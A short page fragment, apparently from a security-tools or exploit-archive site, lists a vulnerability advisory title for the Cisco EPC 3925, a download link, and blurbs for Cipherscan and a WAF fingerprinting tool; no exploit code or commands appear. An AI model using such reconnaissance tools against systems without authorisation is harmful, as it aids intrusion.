"Cisco EPC 3925 - Multiple Vulnerabilities"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.